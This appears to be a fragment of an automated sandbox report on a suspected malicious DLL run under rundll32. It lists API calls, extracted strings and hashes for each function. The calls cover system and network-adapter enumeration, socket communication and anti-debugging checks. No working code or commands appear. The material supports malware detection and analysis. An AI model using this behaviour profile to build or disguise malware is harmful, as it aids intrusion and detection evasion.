                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Ios_base_dtorconnectgethostbynamerecvsendsocketstd::ios_base::_std::ios_base::clear
                      • String ID: -P

                      Control-flow Graph

                      • control_flow_graph 3526, starting at 7f36a8e8; named calls: GetActiveWindow, GetCursor, GetCursorPos, lstrlenW, SetLastError
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Similarity
                      • API ID:
                      • String ID: 4A$-:$P

                      Control-flow Graph

                      • control_flow_graph 3776, starting at 7f3ae390; named calls: GetPEB, GlobalMemoryStatusEx
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __aulldiv$GlobalMemoryStatus
                      • String ID: @
                      • API String ID: 2185283323-2766056989
                      • Opcode ID: f1058deb4e9371ed4da84e2f728fe60e268b50bef84b7ef11c0971e1d6617e30
                      • Instruction ID: d603ad2a77c3fb06f6d701f457b5054f0f8818baecd925c1a4fd6a5d2feed157
                      • Opcode Fuzzy Hash: f1058deb4e9371ed4da84e2f728fe60e268b50bef84b7ef11c0971e1d6617e30
                      • Instruction Fuzzy Hash: A071BFB8E042599FCB04CF99C490AAEFBB1FF48304F108299E915AB345D735AA81CF55

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: &$'$=$N/A$\
                      • API String ID: 0-1891767656
                      • Opcode ID: ca766ed53767808d2822ac657a1de846e492765e848ecad22cf152df390136f1
                      • Instruction ID: bfa29631605c47ab2da40d6c0b9566ca645f60a5a4b9b705ee167b8d6897d2af
                      • Opcode Fuzzy Hash: ca766ed53767808d2822ac657a1de846e492765e848ecad22cf152df390136f1
                      • Instruction Fuzzy Hash: 67420474E04218CBDB15CFA9C890BEEB7B2FF98300F1081A9E509AB354EB755A85CF55

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      APIs
                      • GetComputerNameExA.KERNEL32(?,?,?), ref: 7F3AEA33
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ComputerName
                      • String ID: WORKGROUP
                      • API String ID: 3545744682-2380569353
                      • Opcode ID: 13ab42e3733de6260c869bbf811c2ca199380bc36d976ab155ad0de14533ffc0
                      • Instruction ID: d73cd0fff267bd7c5ad1e438c6681252ef2c7209f8ecefe54a8136bfa084944d
                      • Opcode Fuzzy Hash: 13ab42e3733de6260c869bbf811c2ca199380bc36d976ab155ad0de14533ffc0
                      • Instruction Fuzzy Hash: 64B1DE74E04258DFDB58CFA9C890B9DBBB2FF48304F208299D849A7345D735AA85CF51

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: std::exception::exception
                      • String ID: L
                      • API String ID: 2807920213-2909332022
                      • Opcode ID: 882c671d75ed24ca2c0f1dae7ca39d9109bb1e28c62f43b4d6d05dc1a20b3180
                      • Instruction ID: 7bfb8caaa26903f2db507557bdf0b56c21df48711f84d2652aeda166b110dd37
                      • Opcode Fuzzy Hash: 882c671d75ed24ca2c0f1dae7ca39d9109bb1e28c62f43b4d6d05dc1a20b3180
                      • Instruction Fuzzy Hash: 97032FB0D0126CCBDB65DB68CC94BEEBBB4AF59304F1081D9D409A7281DB346B85CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      APIs
                      • GetAdaptersInfo.IPHLPAPI(?,?), ref: 7F3AB687
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: AdaptersInfo
                      • String ID:
                      • API String ID: 3177971545-0
                      • Opcode ID: ecb3703bfb739008ff5fb2f425c5b1f38e4bf5323afb318f6fced1f23a85cefe
                      • Instruction ID: caf8f1732e4252a592c52b3d78b642df55afad85f99b5067842a461feeab6cbf
                      • Opcode Fuzzy Hash: ecb3703bfb739008ff5fb2f425c5b1f38e4bf5323afb318f6fced1f23a85cefe
                      • Instruction Fuzzy Hash: 14A2BE74E052698FCB68CF59C894BEDBBB1BF89304F1081DAD849A7355DB31AA81CF50

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: "
                      • API String ID: 0-123907689
                      • Opcode ID: 0dbefd3ca178467561b08a9fafa7990dc7198fc67fdee4f62e4b777fcb4c96e5
                      • Instruction ID: 29316be6804f7f483f9bbf53ccd85200dd14e25a836f968330f39e538b62b193
                      • Opcode Fuzzy Hash: 0dbefd3ca178467561b08a9fafa7990dc7198fc67fdee4f62e4b777fcb4c96e5
                      • Instruction Fuzzy Hash: 15A230B0D0125CDBCB15DFA8C990BEEBBB4AF49304F1081D9D459A7281EB346B85CFA1

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      APIs
                      • GetSystemInfo.KERNEL32(?), ref: 7F3AB117
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoSystem
                      • String ID:
                      • API String ID: 31276548-0
                      • Opcode ID: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                      • Instruction ID: e1f0826a4ef11217652a482d7c762d0351881663090e673a563ae1b4f2a16959
                      • Opcode Fuzzy Hash: 0799e872704a2c02d3917b2289854fd93e3ac26d7fb6a869771213d8eff4452c
                      • Instruction Fuzzy Hash: CE619E78E042599FCB08CF99C590AEDFBB1FF48304F24819AE815AB345D735AA41CF90
                      APIs
                      • CreateMutexA.KERNEL32(00000000,00000001,?,?,?,A819E2D1,000CB52E), ref: 7F35BAF4
                      • GetProcessHeap.KERNEL32(FFFFB705,00000000,000000A8,00000000), ref: 7F35BB15
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateHeapMutexProcess
                      • String ID: tFailedtoaddbootent
                      • API String ID: 2384059268-1493962688
                      • Opcode ID: 219576b5c1ec34872ecc05fc67d39be6f4f89fa3d6ac72da8df19dc5cae68f19
                      • Instruction ID: 215a402db50eb7f0ea1ddb30172beef6bfa6a5d751e7301972cf3f4230a60256
                      • Opcode Fuzzy Hash: 219576b5c1ec34872ecc05fc67d39be6f4f89fa3d6ac72da8df19dc5cae68f19
                      • Instruction Fuzzy Hash: 72C18E7AD04264DFDB14CF7AC8907ADBFF1AB88325F28819AD449A7345D7349990CF60
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,?,?,00000065,?,?,65004400,43CBB420,00000000,FFFFB705,00000000,?,00000000,08A8B478), ref: 7F39867B
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: 4A$,;T*$<$C$Exceptionencounter$SOFTWARE/Microsoft$Y$e$g$tFailedtoaddbootent
                      • API String ID: 1659193697-3795500999
                      • Opcode ID: a4a7e43eb00b580fe25853d449e7b02820e078a06d9bf132bb6718cb575b362c
                      • Instruction ID: dc0bac28e059059e99e571a3929f6276109dce9f2a1a8ae393c93b4006cd53f4
                      • Opcode Fuzzy Hash: a4a7e43eb00b580fe25853d449e7b02820e078a06d9bf132bb6718cb575b362c
                      • Instruction Fuzzy Hash: 50F2D17A9052A4DFDB04CFAAC5907BEBFF1BB99325F28819ED445A7246D3348950CF20
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Menu$ErrorFocusLastMessageWow64
                      • String ID: 4A$advapi32$m$tFailedtoaddbootent
                      • API String ID: 1239082975-1105196973
                      • Opcode ID: d6c0db44f48c6390a5a206c492346c5d78b89c8fc00d728f7169d75a9a0b0fc4
                      • Instruction ID: 4dc50b432723dad0ae2f4ae843261e2a837600f48e5de2e4afe9b03a4199f9f9
                      • Opcode Fuzzy Hash: d6c0db44f48c6390a5a206c492346c5d78b89c8fc00d728f7169d75a9a0b0fc4
                      • Instruction Fuzzy Hash: 19B27E7AD04268DFDB14CF6AC9807ADBFF5FB88320F28815AD449A7245D7349A91CF60
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$!$4N
                      • API String ID: 0-1607115507
                      • Opcode ID: b6bc480252da4cc129dfbe1eb8be932fa77bc414fde70d8e4397991929fe728d
                      • Instruction ID: 65dca0d4e7cfc2cddc22c5e4b0f7b5c006dab7af42cc8ee7c0b4e5f00bf11dc5
                      • Opcode Fuzzy Hash: b6bc480252da4cc129dfbe1eb8be932fa77bc414fde70d8e4397991929fe728d
                      • Instruction Fuzzy Hash: BEF28C7AD04268DBDB14CFAAC9807ADBFF5FF48314F28815AE449A7245D7349A90CF24
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter$tFailedtoaddbootent
                      • API String ID: 3268636600-671415319
                      • Opcode ID: 2eb50a764f34aa0a0ccf570545d8f5d65bfaceb74b468e1ad84ca746b4cd7ec5
                      • Instruction ID: 4b4b3f49fc2ed8dfc4ce4930310d47bb6c894f883d6702c87c31d22bf7fdc7ff
                      • Opcode Fuzzy Hash: 2eb50a764f34aa0a0ccf570545d8f5d65bfaceb74b468e1ad84ca746b4cd7ec5
                      • Instruction Fuzzy Hash: D7A2AF7A904264DBDB14CF6AC8907ADBFF5FB48321F28815EE449A7249D7389990CF24
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$K6$W}$Z$tFailedtoaddbootent
                      • API String ID: 0-1680128509
                      • Opcode ID: 4e3861153642b6bb915412dfd1e5ffb687e97a9f2e3829ee9f497f342f574344
                      • Instruction ID: 326d309edb4b81cf60ea6ca096e3349cad01da26c984841ac091ae7c97f13142
                      • Opcode Fuzzy Hash: 4e3861153642b6bb915412dfd1e5ffb687e97a9f2e3829ee9f497f342f574344
                      • Instruction Fuzzy Hash: B823B17A908264DBDB04CFAAC4907BEBFF1BF59315F28815ED445A7246D3388A90CF64
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter
                      • API String ID: 3268636600-279345641
                      • Opcode ID: 1dafcf2ec2213fa83325a564b9f47ed652ee5abc1df33bb3c5952c575aaf0139
                      • Instruction ID: af1f4c3154f8ce9c9bb5fe7d5425ce57978f92880912b9f86b4ec8a5f9d3602b
                      • Opcode Fuzzy Hash: 1dafcf2ec2213fa83325a564b9f47ed652ee5abc1df33bb3c5952c575aaf0139
                      • Instruction Fuzzy Hash: DE82D17A904264DBDB14CF6AC8907BDBFF5FB48321F28815EE449A7249D7389990CF24
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter
                      • API String ID: 3268636600-279345641
                      • Opcode ID: a5216ba28e2387216a676226b5a0c840c00acdbb550bf16db6976c018f95c89a
                      • Instruction ID: c9996b2eb54559aff12b456feaa21ec94b6143244c58b6b7f00fbf1d549e175f
                      • Opcode Fuzzy Hash: a5216ba28e2387216a676226b5a0c840c00acdbb550bf16db6976c018f95c89a
                      • Instruction Fuzzy Hash: 7882C17A904264DBDB14CF6AC8907BDBFF5FB48321F28815EE449A7249D7389990CF24
                      APIs
                      • GetCursor.USER32(80BD08A8,?,?,?,?,?,00000000,?,?,?,87783EA4,FFFFFFFF,?,?,95A17443,000CD5DA), ref: 7F36C57E
                      • GetCursorPos.USER32(00000000), ref: 7F36C5A4
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: Cursor
                      • String ID: 4A$Exceptionencounter
                      • API String ID: 3268636600-279345641
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CtrlShellWindow
                      • String ID: 4A$r$tFailedtoaddbootent
                      • API String ID: 3408278428-993686396
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: __floor_pentium4
                      • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                      • API String ID: 4168288129-2761157908
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 9$>$I$O$b$o$y
                      • API String ID: 0-3731792213
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: B$TD$X$tFailedtoaddbootent
                      • API String ID: 0-2568232824
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$2$5$<$T$j$p
                      • API String ID: 0-942779811
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A
                      • API String ID: 0-1298712752
                      APIs
                      • GetLocaleInfoW.KERNEL32(?,2000000B,7F3EB249,00000002,00000000,?,?,?,7F3EB249,?,00000000), ref: 7F3EAFC4
                      • GetLocaleInfoW.KERNEL32(?,20001004,7F3EB249,00000002,00000000,?,?,?,7F3EB249,?,00000000), ref: 7F3EAFED
                      • GetACP.KERNEL32(?,?,7F3EB249,?,00000000), ref: 7F3EB002
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: InfoLocale
                      • String ID: ACP$OCP
                      • API String ID: 2299586839-711371036
                      APIs
                      • lstrlenW.KERNEL32(?,?,?,-D4A73215,43CBB325), ref: 7F36CD3C
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: lstrlen
                      • String ID: Exceptionencounter$b$tFailedtoaddbootent
                      • API String ID: 1659193697-899374484
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: TD$X$q
                      • API String ID: 0-280752806
                      APIs
                      • GetACP.KERNEL32(?,?,?,?,?,?,7F3E2DE2,?,?,?,00000055,?,-00000050,?,?,00000001), ref: 7F3EA85D
                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,7F3E2DE2,?,?,?,00000055,?,-00000050,?,?), ref: 7F3EA888
                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 7F3EA9EB
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodeInfoLocalePageValid
                      • String ID: utf8
                      • API String ID: 790303815-905460609
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$Windows::Compat::A$tFailedtoaddbootent
                      • API String ID: 0-1618564604
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$Failedtogetpointer$tFailedtoaddbootent
                      • API String ID: 0-2555035225
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$Windows::Compat::A$tFailedtoaddbootent
                      • API String ID: 0-1618564604
                      APIs
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: _strrchr
                      • String ID:
                      • API String ID: 3213747228-0
                      APIs
                      • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 7F3D18D3
                      • IsDebuggerPresent.KERNEL32 ref: 7F3D199F
                      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 7F3D19B8
                      • UnhandledExceptionFilter.KERNEL32(?), ref: 7F3D19C2
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                      • String ID:
                      • API String ID: 254469556-0
                      APIs
                      • IsValidCodePage.KERNEL32(?), ref: 7F365D80
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodePageValid
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 1911128615-684839989
                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ActiveWindow
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 2558294473-684839989
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      APIs
                      • IsValidCodePage.KERNEL32(00000001), ref: 7F35ACDD
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: CodePageValid
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 1911128615-684839989
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: FkkhdfsbObfw$U$k$s
                      • API String ID: 0-2251587115
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 7F3D584B
                      • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 7F3D5855
                      • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 7F3D5862
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                      • String ID:
                      • API String ID: 3906539128-0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: @$@$PE
                      • API String ID: 0-2458287169
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: '-.
                      • API String ID: 0-1971626124
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      APIs
                      • IsDebuggerPresent.KERNEL32(?,?,?,7F3DF125,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,?,?,7F33B8DF,?,?,00000000,00000480), ref: 7F3E68F0
                      • OutputDebugStringW.KERNEL32(00003C16,?,7F3DF125,?,Microsoft Visual C++ Runtime Library,00012012,?,00000240,?,?,7F33B8DF,?,?,00000000,00000480), ref: 7F3E6907
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID: DebugDebuggerOutputPresentString
                      • String ID:
                      • API String ID: 4086329628-0
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_14_2_7f330000_rundll32.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: 4A$tFailedtoaddbootent
                      • API String ID: 0-684839989
                      Strings
                      Memory Dump Source
                      • Source File: 0000000E.00000002.3114216108.000000007F330000.00000040.00001000.00020000.00000000.sdmp, Offset: 7F330000, based on PE: true
                      Joe Sandbox IDA Plugin
